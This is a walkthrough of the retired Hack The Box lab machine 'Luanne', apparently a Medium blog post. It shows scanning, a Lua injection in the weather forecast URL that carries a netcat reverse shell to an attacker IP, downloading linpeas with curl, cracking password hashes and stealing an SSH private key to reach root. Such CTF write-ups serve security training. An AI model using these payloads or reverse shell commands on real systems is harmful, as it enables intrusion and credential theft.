Luanne Walkthrough ️

☠️ Hack The Box ☠️

Hello everyone..!! This is Walkthrough of the Luanne Machine which is now retired . Luanne Machine is rated difficulty level as easy , its release date is 28 Nov 2020 and retired date is 27 Mar 2021. Ip of the machine is 10.10.10.218 . Let Start…

Port Scanning : Nmap

Command :

nmap -v -sC -sT -sV -A -p- 10.10.10.218

Output :

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (NetBSD 20190418-hpn13v14-lpk; protocol 2.0)
| ssh-hostkey:
| 3072 20:97:7f:6c:4a:6e:5d:20:cf:fd:a3:aa:a9:0d:37:db (RSA)
| 521 35:c3:29:e1:87:70:6d:73:74:b2:a9:a2:04:a9:66:69 (ECDSA)
|_ 256 b3:bd:31:6d:cc:22:6b:18:ed:27:66:b4:a7:2a:e4:a5 (ED25519)
80/tcp open http nginx 1.19.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=.
| http-methods:
|_ Supported Methods: GET HEAD POST
| http-robots.txt: 1 disallowed entry
|_/weather
|_http-server-header: nginx/1.19.0
|_http-title: 401 Unauthorized
9001/tcp open http Medusa httpd 1.12 (Supervisor process manager)
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=default
|_http-server-header: Medusa/1.12
|_http-title: Error response
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=3/27%OT=22%CT=1%CU=31120%PV=Y%DS=2%DC=T%G=Y%TM=605E2D9
OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=D8%GCD=1%ISR=DC%TI=Z%CI=Z%II=I)OPS(O1=M54
OS:DNW3ST11%O2=M54DNW3ST11%O3=M54DNW3NNT11%O4=M54DNW3ST11%O5=M54DNW3ST11%O6
OS:=M54DST11)WIN(W1=8000%W2=8000%W3=8000%W4=8000%W5=8000%W6=8000)ECN(R=Y%DF
OS:=Y%T=40%W=8000%O=M54DNW3SLL%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%
OS:Q=)T2(R=Y%DF=N%T=40%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=40%W=8000%
OS:S=O%A=S+%F=AS%O=M54DNW3ST11%RD=0%Q=)T4(R=Y%DF=N%T=40%W=0%S=A%A=Z%F=R%O=%
OS:RD=0%Q=)T5(R=Y%DF=N%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=40%W
OS:=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=N%T=40%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)U
OS:1(R=Y%DF=N%T=FF%IPL=38%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI
OS:=N%T=FF%CD=S)
Uptime guess: 0.001 days (since Sat Mar 27 00:21:41 2021)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=213 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: NetBSD; CPE: cpe:/o:netbsd:netbsd
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 216.70 ms 10.10.14.1
2 216.88 ms luanne.htb (10.10.10.218)
NSE: Script Post-scanning.
Initiating NSE at 00:23
Completed NSE at 00:23, 0.00s elapsed
Initiating NSE at 00:23
Completed NSE at 00:23, 0.00s elapsed
Initiating NSE at 00:23
Completed NSE at 00:23, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2786.73 seconds
Raw packets sent: 94 (7.522KB) | Rcvd: 172 (36.766KB)

Port 80 Enumeration

From the port scanning we come to know about that the port 80 is open whics is assigned for http ( web service ) . On visiting to the port 80 we find that there is a basic authentication is put up for the web page .

After that i want to see source code of the page but there also it want username and password . Next step is directory bruteforcing.

Command :

dirsearch -u http://10.10.10.218/ -E

Output :

  _|. _ _  _  _  _ _|_    v0.4.0
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, html, htm, js | HTTP method: GET | Threads: 20 | Wordlist size: 10023Error Log: /root/dirsearch/logs/errors-21–03–26_23–40–21.logTarget: http://10.10.10.218/Output File: /root/dirsearch/reports/10.10.10.218/_21–03–26_23–40–22.txt[23:40:22] Starting:
[23:41:38] 200–612B — /index.html
[23:42:01] 200–78B — /robots.txt
Task Completed

Here we found robots.txt, let see the content of robots.txt file

There is entry of weather directory and also a comment which gives us hint that on weathr directory there is 404 but still something is present on it , so now we have to visit on /weather directory.

As they said there is 404. But according to their hint something is present in directory , again we move toward the directory bruteforcing inside weather directory.

Command:

dirsearch -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.218/weather -E

Output :

dirsearch -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.218/weather/ -E_|. _ _ _ _ _ _|_ v0.4.0
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, html, htm, js | HTTP method: GET | Threads: 20 | Wordlist size: 220520Error Log: /root/dirsearch/logs/errors-21–03–27_00–19–22.logTarget: http://10.10.10.218/weather/Output File: /root/dirsearch/reports/10.10.10.218/weather_21–03–27_00–19–22.txt[00:19:22] Starting:
[00:20:47] 200–90B — /weather/forecast
CTRL+C detected: Pausing threads, please wait…

We find forecast directory inside the weather and also we get hint to move forward, which is city=list.

Now we have to pass the city variable with list parameter as we seen in forecast page .

http://10.10.10.218/weather/forecast?city=list

Output :

we get city name list to pass into the city .

http://10.10.10.218/weather/forecast?city=London

Output :

We could not found any interesting thing inside this city name . On passing single quote there is some error .

http://10.10.10.218/weather/forecast?city=London’

output :

Error is about the Lua script . Let search for the Lua on gtfobins

https://gtfobins.github.io/#

we found a function through which we can execute system command. From the output of nmap we come to know that the OS is running on this machine is openBSD . Now search for reverse shell for openBSD on github.

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Reverse Shell Cheatsheet.md

On this website we find all the oneliner reverse shell . We get reverse shell for BSD .

Now we have to make a payload to get the reverse shell.

http://10.10.10.218/weather/forecast?city=London‘);os.execute(“rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.112 4455 >/tmp/f”)-- 

Here,

10.10.14.112 : Localhost of htb

4455 : port to get the reverse connection.

Now encrypt the payload.

http://10.10.10.218/weather/forecast?city=London%27)%3Bos.execute(%22rm%20%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.14.112%204455%20%3E%2Ftmp%2Ff%22)--

Start the Listner on port 4455

nc -nlvp 4455

Now visit to the encrypted url and grab the shell.

We get shell of _httpd user.

On visiting home directory we find that there is 1 user r.michaels

I find .htpasswd file on analysing /var/www directory

$ cd /var/www$ ls -lah$ cat .htpasswd

We get a username and password hash .

To identify hash we use hash-identifier

We come to know that the hash is MD5(unix).

Now we have to crack the hast using hashcat.

hashcat --help | grep -i unix

500 is our hash number.

Now make ka file and put our hash inside it. for example : hash.txt

Run the following command to crack the hash .

hashcat -m 500 hash.txt /usr/share/wordlists/rockyou.txt

On completing this command run :

hashcat -m 500 hash.txt /usr/share/wordlists/rockyou.txt --show

password for the hash is iamthebest

Now we have valid credentials .

webapi_user : iamthebest

This successfully work on the port 80 basic authentication , but htere is nothing special found.

Remember that ,on port 80 when we cancle the authentication then there is address 127.0.0.1:300 According to this run the command

netstat -an

we found port 3000 and 3001 is running locally .

I have putted linpeas.sh script on the shell using curl

curl http://10.10.14.112/linpeas.sh --output /tmp/linpeas.shchmod +x linpeas.sh./linpeas.sh

I get interesting thing which give me idea to use curl command.

r.michaels 185 0.0 0.0 35268 2008 ? Is 5:57AM 0:00.00 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3001 -L weather /home/r.michaels/devel/webapi/weather.lua -P /var/run/httpd_devel.pid -U r.michaels -b /home/r.michaels/devel/www

Now we use curl command to grab the ssh private key of the user

curl --user webapi_user:iamthebest 127.0.0.1:3001/~r.michaels/id_rsa

Finally we get the ssh private key.

Come back to your attacker pc make a file id_rsa and and puth the whole key inside it . Give the permission of 600 to id_rsa and now our key is ready .

# vim id_rsa (put the key inside it)# chmod 600 id_rsa

Now login to ssh for user r.michaels using id_rsa

ssh -i id_rsa r.michaels@10.10.10.218

We get the user shell. Grab the user flag.

Now we have to root the machine.

On analysing directiories again I found hash inside /var/www/.htaccess

Crack the hash same as privious hash and we get the password littlebear

Now try this password to root the machine.Run the following command

doas su

Enter the password : littlebear

Finally we get root shell. Grab the root flag /root/root.txt and submit it .

And the happiness of seeing this window is on next leve 😍😍.

HAPPY HACKING…!!

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store